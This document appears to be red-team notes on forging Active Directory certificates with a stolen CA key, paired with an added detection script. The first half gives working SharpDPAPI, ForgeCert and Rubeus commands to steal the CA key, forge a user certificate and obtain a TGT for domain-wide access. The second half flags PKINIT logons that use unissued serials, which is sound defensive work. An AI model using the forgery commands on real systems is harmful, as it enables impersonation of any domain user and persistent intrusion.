Forged Certificates

(on a CA, in this case the DC)

Obtain the CA's private key

SharpDPAPI.exe certificates /machine

Save the private key and certificate to a .pem file and convert it to a .pfx with openssl

Then, build the forged certificate with ForgeCert

ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "[email protected]" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass123

Use Rubeus to request a legitimate TGT with the forged certificate

Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /certificate:MIACAQ[...snip...]IEAAAA /password:pass123 /nowrap

Combine this with the S4U2self trick to gain access to any machine or service in the domain.
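Because ForgeCert signs the new certificate directly with the stolen CA key, the certificate never passes through the CA's issuance process and its serial number is absent from the CA database. The following added example (not from the original page or from the Rubeus/ForgeCert projects) shows the detection a defender can build on that fact: it parses Event ID 4768 entries from a DC's Security log, keeps the PKINIT ones (Pre-Authentication Type 16, which carry the certificate issuer, serial and thumbprint), and flags any whose serial was never issued by the named CA. The event text, the CA name `sub-ca` and the issued-serial list are constructed samples; in practice the issued list would come from the CA's database (e.g. a `certutil -view` export).

```python
"""Flag PKINIT TGT requests that used a certificate the CA never issued.

Added example, not from the original page. Inputs are constructed:
Event 4768 text as exported from a DC Security log, and a dictionary of
serial numbers the CA is known to have issued.
"""
import re

# Constructed sample of three 4768 events; "----" separates them. Only the
# fields relevant to the check are included, and all values are made up.
SAMPLE_EVENTS = """
A Kerberos authentication ticket (TGT) was requested.
Account Name:\t\tjdoe
Supplied Realm Name:\tdev.cyberbotic.io
Pre-Authentication Type:\t16
Certificate Issuer Name:\tsub-ca
Certificate Serial Number:\t1A0000000C
Certificate Thumbprint:\tA1B2C3D4E5F60718293A4B5C6D7E8F9012345678
----
A Kerberos authentication ticket (TGT) was requested.
Account Name:\t\tnlamb
Supplied Realm Name:\tdev.cyberbotic.io
Pre-Authentication Type:\t16
Certificate Issuer Name:\tsub-ca
Certificate Serial Number:\t5E3F9A0B7C
Certificate Thumbprint:\t0102030405060708090A0B0C0D0E0F1011121314
----
A Kerberos authentication ticket (TGT) was requested.
Account Name:\t\tsvc_backup
Supplied Realm Name:\tdev.cyberbotic.io
Pre-Authentication Type:\t2
Certificate Issuer Name:\t
Certificate Serial Number:\t
Certificate Thumbprint:\t
"""

# Constructed stand-in for the CA's issued-certificate database, keyed by
# the CA name as it appears in the event's "Certificate Issuer Name".
ISSUED_BY_CA = {"sub-ca": {"1A0000000C", "1A0000000D"}}

# Matches "Field Name:<whitespace>value" lines; field names contain only
# letters, spaces and hyphens, so the event's description line is skipped.
FIELD_RE = re.compile(r"^(?P<name>[A-Za-z -]+):\s*(?P<value>.*)$", re.M)

PKINIT_PREAUTH_TYPE = "16"  # PA-PK-AS-REQ


def parse_events(text):
    """Split exported 4768 text into a list of {field: value} dicts."""
    events = []
    for chunk in text.split("----"):
        fields = {m.group("name").strip(): m.group("value").strip()
                  for m in FIELD_RE.finditer(chunk)}
        if fields:
            events.append(fields)
    return events


def norm_serial(serial):
    """Normalise serial formatting (case, spaces, colons) before comparing."""
    return re.sub(r"[^0-9A-F]", "", serial.upper())


def find_unissued_certs(events, issued_by_ca):
    """Return (account, issuer, serial, reason) for suspicious PKINIT logons."""
    findings = []
    for ev in events:
        if ev.get("Pre-Authentication Type") != PKINIT_PREAUTH_TYPE:
            continue  # password or other pre-auth; no certificate to check
        account = ev.get("Account Name", "")
        issuer = ev.get("Certificate Issuer Name", "")
        serial = norm_serial(ev.get("Certificate Serial Number", ""))
        if issuer not in issued_by_ca:
            findings.append((account, issuer, serial, "unknown issuer"))
            continue
        known = {norm_serial(s) for s in issued_by_ca[issuer]}
        if serial not in known:
            findings.append((account, issuer, serial, "serial not in CA database"))
    return findings


def run_check():
    """Run the check over the constructed samples."""
    return find_unissued_certs(parse_events(SAMPLE_EVENTS), ISSUED_BY_CA)


if __name__ == "__main__":
    for account, issuer, serial, reason in run_check():
        print(f"ALERT account={account} issuer={issuer} serial={serial}: {reason}")
```

The check depends on the DC auditing Kerberos Authentication Service events (otherwise no 4768 is written) and on the issued-serial list being refreshed from the CA regularly; a certificate whose issuer name is not a CA you operate at all is worth the same alert, since the DC will still accept it for PKINIT if the issuer chains to a trusted root in NTAuth.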
